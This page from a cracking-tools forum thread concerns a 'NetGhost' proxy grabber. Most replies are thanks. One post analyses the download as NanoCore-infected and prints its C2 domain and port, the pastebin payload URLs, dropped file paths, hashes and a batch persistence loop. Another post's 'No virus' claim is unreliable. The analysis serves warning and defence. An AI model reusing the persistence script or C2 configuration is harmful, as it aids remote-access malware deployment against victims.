Home
Upgrade
Credits
Search
Awards
Auth
Vouches
ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Jump to content

Home Upgrade Credits Search Awards Auth Vouches
Sign In
Create Account


Photo

NetGhost v.1.4 Proxy Grabber and Checker

Started By MyWifeaMyComptr, Apr 05 2019 11:05 PM

  • Please log in to reply
NetGhost v.1.4 Proxy Grabber and Checker

#31
Posted 02 June 2019 - 12:49 PM

moaad0896
moaad0896
    Offline
    0
    Rep
    0
    Likes

    Member

  • PipPipPip
Posts: 39
Threads: 0
Joined: Jun 02, 2019
Credits: 0
Five years registered
#31
Posted 02 June 2019 - 12:49 PM

thank you bro


  • 0

#32
Posted 02 June 2019 - 02:51 PM

subhihattab123
subhihattab123
    Offline
    0
    Rep
    0
    Likes

    Advanced Member

Posts: 102
Threads: 0
Joined: Jun 02, 2019
Credits: 0
Five years registered
#32
Posted 02 June 2019 - 02:51 PM

thnx bro


  • 0

#33
Posted 03 June 2019 - 12:42 AM

alex61
alex61
    Offline
    0
    Rep
    0
    Likes

    Lurker

Posts: 4
Threads: 0
Joined: Jun 03, 2019
Credits: 0
Five years registered
#33
Posted 03 June 2019 - 12:42 AM

thank you bro


  • 0

#34
Posted 03 June 2019 - 12:46 AM

Exxon
Exxon
    Offline
    95
    Rep
    1184
    Likes

    Veteran

Posts: 1639
Threads: 365
Joined: Jun 02, 2018
Credits: 0

Six years registered
#34
Posted 03 June 2019 - 12:46 AM

 

Download Link

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.

 

Virus Total

 

https://www.virustot...844a7/detection

 

:wub:

 

Pw: netghost sry

 

The real VT:https://www.virustot...bce82/detection


  • 0

#35
Posted 03 June 2019 - 12:52 AM

ToneXfield
ToneXfield
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 12
Threads: 1
Joined: Jun 02, 2019
Credits: 0
Five years registered
#35
Posted 03 June 2019 - 12:52 AM

Infected with NanoCore IP: 127.0.0.1:3218

fojasoftwareaudio.ignorelist.com port 3218

 

RequestElevation [u'00']
BypassUAC [u'00']
RestartDelay [5000]
Group [u'Default']
RunOnStartup [u'00']
PreventSystemSleep [u'01']
UseCustomDNS [u'01']
PrimaryDNSServer [u'8.8.8.8']
ConnectDelay [4000]
EnableDebugMode [u'00']
Version [u'\x071.2.2.0']
Mutex [u'1b42c98c9fdad244823f5067e2cdb096']
SetCriticalProcess [u'00']
Domain2 [u'127.0.0.1']
Domain1 [u'fojasoftwareaudio.ignorelist.com']
Port [3218]
ClearAccessControl [u'00']
ClearZoneIdentifier [u'01']

 

HTTPS REQUEST

.pastebin.com

GET /raw/7kcDT0fn HTTP/1.1

GET /raw/VAyUNc0W HTTP/1.1

http://pastebin.com/raw/7kcDT0fn

http://pastebin.com/raw/VAyUNc0W

-------------------------------------------------

 

fojasoftwareaudio.ignorelist.com

response: NXDOMAIN

https://www.virustot...ist.com/details

 

creates new folder

file: mggdfd.exe.bat

C:\Users\user\AppData\Local\Temp\iuytuyt\mggdfd.exe.bat

(md5: e6f4e34683764b280b18c5c2fd242959)

:_Start
timeout /t 300
tasklist /nh /fi "imagename eq tbdadf.exe" | find /i "tbdadf.exe" >nul && (
Goto _Start
) || (
Start /W "" "\Microsoft\Windows\Start Menu\Programs\Startup\mggdfd.exe"
Goto _Start
)

create new file

melt.bat

C:\Users\user\AppData\Local\Temp\iuytuyt\melt.bat

(md5: e37e452eba99d96f0333f21ec7b00295)

\xff\xfeC\x00:\x00\\x00U\x00s\x00e\x00r\x00s\x00\\x00u\x00s\x00e\x00r\x00\\x00A\x00p\x00p\x00D\x00a\x00t\x00a\x00\\x00L\x00o\x00c\x00a\x00l\x00\\x00T\x00e\x00m\x00p\x00\\x00N\x00e\x00t\x00G\x00h\x00o\x00s\x00t\x00 \x00v\x001\x00.\x004\x00.\x000\x00.\x000\x00.\x00e\x00x\x00e\x00

create new file

file NetGhost v1.4.0.0.exe

C:\Users\user\AppData\Local\Temp\NetGhost v1.4.0.0.exe
C:\Users\user\AppData\Local\Temp\iuytuyt\mggdfd.exe

(md5: 5cdbe3705956b9cf95e30da13d6ff178)

 

create new file

NetGhost_Latest.zip

C:\Users\user\AppData\Local\Temp\NetGhost_Latest.zip

(md5: d41d8cd98f00b204e9800998ecf8427e)

create new file

GDIPFONTCACHEV1.DAT

C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

(md5: 1bba2e8a1b56ec52dd7805093b4839d3)

 

create  new file

tbdadf.exe

C:\Users\user\AppData\Local\Temp\tbdadf.exe

(md5: 2e5f1cf69f92392f8829fc9c9263ae9b)

create new file

NG 1.4.exe

C:\Users\user\AppData\Local\Temp\NG 1.4.exe

(md5: 12189a91572eb3b56ada659ad4f57752)


Edited by ToneXfield, 03 June 2019 - 01:24 AM.

  • 0

Malware Analysis / Reverse Engineer / Coder - KILL ON SIGHT - 

?url=https%3A%2F%2Fi.imgur.com%2FfQtNKCu

#36
Posted 13 June 2019 - 11:23 AM

zelus
zelus
    Offline
    -1
    Rep
    8
    Likes

    Addicted

Posts: 187
Threads: 2
Joined: Aug 17, 2017
Credits: 0
Seven years registered
#36
Posted 13 June 2019 - 11:23 AM

There is a report that this is bundled with Nanocore

 

https://www.nulled.t...-1/?hl=nanocore


  • 0

the gods do not regard Reviews gotten with Vouch Copy so i do not.

#37
Posted 20 June 2019 - 12:09 PM

sofien01
sofien01
    Offline
    0
    Rep
    1
    Likes

    New Member

  • PipPip
Posts: 17
Threads: 0
Joined: Jun 05, 2019
Credits: 0
Five years registered
#37
Posted 20 June 2019 - 12:09 PM

thank youu


  • 0

#38
Posted 20 June 2019 - 12:55 PM

SLEDFAST
SLEDFAST
    Offline
    0
    Rep
    0
    Likes

    Member

Posts: 68
Threads: 4
Joined: Dec 07, 2018
Credits: 0
Six years registered
#38
Posted 20 June 2019 - 12:55 PM

No virus amazing 


  • 0

#39
Posted 23 June 2019 - 11:05 AM

lekekoko
lekekoko
    Offline
    0
    Rep
    1
    Likes

    Advanced Member

  • PipPipPipPip
Posts: 111
Threads: 0
Joined: Mar 28, 2019
Credits: 0
Five years registered
#39
Posted 23 June 2019 - 11:05 AM

 

Download Link

 

 

 

Virus Total

 

https://www.virustot...844a7/detection

 

:wub:

 

Pw: netghost sry

 

uh8hhh8 8nun jjnjn


  • 0

#40
Posted 01 July 2019 - 11:43 AM

xoxoqq16
xoxoqq16
    Offline
    0
    Rep
    0
    Likes

    Addicted

  • PipPipPipPipPip
Posts: 249
Threads: 0
Joined: May 14, 2019
Credits: 0

Five years registered
#40
Posted 01 July 2019 - 11:43 AM

try


  • 0
Back to Cracking Tools

 Users browsing this thread:

  1. Nulled
  2. Cracking
  3. Cracking Tools